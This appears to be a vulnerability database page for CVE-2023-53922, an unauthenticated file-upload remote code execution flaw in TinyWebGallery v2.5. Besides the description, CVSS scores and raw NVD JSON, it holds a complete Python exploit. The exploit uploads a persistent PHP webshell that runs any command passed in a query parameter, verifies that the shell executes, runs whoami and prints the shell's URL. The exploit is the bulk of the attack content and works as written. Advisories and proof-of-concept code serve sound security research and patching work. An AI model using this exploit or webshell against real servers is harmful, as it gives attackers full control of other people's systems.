Security Vulnerability Report
CVE-2023-53922 CVSS 9.8 CRITICAL

CVE-2023-53922

Published: 2025-12-17 23:15:51
Last Modified: 2025-12-24 16:50:21

Description

TinyWebGallery v2.5 contains a remote code execution vulnerability in the admin upload functionality that allows unauthenticated attackers to upload malicious PHP files. Attackers can upload .phar files with embedded system commands to execute arbitrary code on the server by accessing the uploaded file's URL.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:tinywebgallery:tinywebgallery:2.5:*:*:*:*:*:*:* - VULNERABLE
TinyWebGallery v2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note that it uploads a persistent PHP webshell to the target and does not remove it; delete the uploaded file once testing is complete.
python
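"""CVE-2023-53922 PoC - TinyWebGallery v2.5 RCE via unrestricted file upload.

Uploads a minimal PHP webshell through the unauthenticated admin upload
handler, then confirms code execution by fetching the uploaded file.

WARNING: this leaves a webshell (``evil.php`` by default) on the target
filesystem; remove it once authorized testing is complete.

NOTE(review): the advisory text describes uploading ``.phar`` files, while
this PoC uploads a ``.php`` name. If ``.php`` is rejected, retry with
``upload_name`` set to a ``.phar`` filename.
"""
import secrets
import sys

import requests

# Minimal webshell: runs the value of the ``cmd`` query parameter via system().
_WEBSHELL = b"<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"


def _upload_files(upload_name: str, content: bytes) -> dict[str, tuple]:
    """Build the multipart form fields the admin upload handler expects.

    Args:
        upload_name: Filename sent in the ``file`` part.
        content: Raw bytes of the uploaded file.

    Returns:
        A ``files`` mapping suitable for ``requests.post``; the ``action``
        field is sent as a plain form value (no filename).
    """
    return {
        'file': (upload_name, content, 'application/x-php'),
        'action': (None, 'upload'),
    }


def exploit(target_url, webshell_path=None, *, upload_name='evil.php', timeout=10):
    """Exploit CVE-2023-53922 against a TinyWebGallery instance.

    Args:
        target_url: Base URL of the vulnerable instance without a trailing
            slash, e.g. ``http://target.com/twg``.
        webshell_path: URL path where the uploaded file becomes reachable.
            Defaults to ``/admin/photos/<upload_name>``.
        upload_name: Filename sent in the multipart upload.
        timeout: Per-request timeout in seconds.

    Returns:
        bool: True only when a command echoed a random marker back, i.e. the
        uploaded file is actually executed as PHP; False on upload rejection,
        an unreachable file, a non-executed file, or a network error.
    """
    if webshell_path is None:
        webshell_path = f"/admin/photos/{upload_name}"
    upload_url = f"{target_url}/admin/index.php"
    shell_url = f"{target_url}{webshell_path}"
    # A bare HTTP 200 is not proof of execution: a gallery page or the raw PHP
    # source served as text also returns 200. Require a random marker instead.
    marker = secrets.token_hex(8)

    try:
        # Step 1: upload the webshell (no authentication required).
        print(f"[*] Uploading malicious PHP file to {upload_url}...")
        upload = requests.post(
            upload_url,
            files=_upload_files(upload_name, _WEBSHELL),
            timeout=timeout,
        )
        if upload.status_code >= 400:
            print(f"[-] Upload rejected: HTTP {upload.status_code}")
            return False

        # Step 2: prove execution by echoing the marker through the shell.
        print(f"[*] Testing webshell at {shell_url}...")
        probe = requests.get(shell_url, params={'cmd': f'echo {marker}'}, timeout=timeout)
        if probe.status_code != 200:
            print(f"[-] Failed: HTTP {probe.status_code} (file not reachable at {webshell_path})")
            return False
        if marker not in probe.text:
            print("[-] Failed: file reachable but not executed as PHP (marker missing)")
            return False

        # Step 3: show a human-readable result only after execution is confirmed.
        output = requests.get(shell_url, params={'cmd': 'whoami'}, timeout=timeout)
        print("[+] SUCCESS! RCE achieved!")
        print(f"[+] Command output: {output.text.strip()}")
        print(f"[+] Webshell URL: {shell_url}?cmd=<command>")
        return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com/twg")
        sys.exit(1)
    target = sys.argv[1].rstrip('/')
    # Non-zero exit on failure so the script composes with shell pipelines.
    sys.exit(0 if exploit(target) else 1)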

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53922", "sourceIdentifier": "[email protected]", "published": "2025-12-17T23:15:51.270", "lastModified": "2025-12-24T16:50:20.607", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "TinyWebGallery v2.5 contains a remote code execution vulnerability in the admin upload functionality that allows unauthenticated attackers to upload malicious PHP files. Attackers can upload .phar files with embedded system commands to execute arbitrary code on the server by accessing the uploaded file's URL."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tinywebgallery:tinywebgallery:2.5:*:*:*:*:*:*:*", "matchCriteriaId": "B3FAA560-76CA-4FEB-A469-5D9FBC5A82F4"}]}]}], "references": [{"url": "http://www.tinywebgallery.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51443", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/tinywebgallery-remote-code-execution-via-unrestricted-file-upload", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}, {"url": "https://www.exploit-db.com/exploits/51443", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}}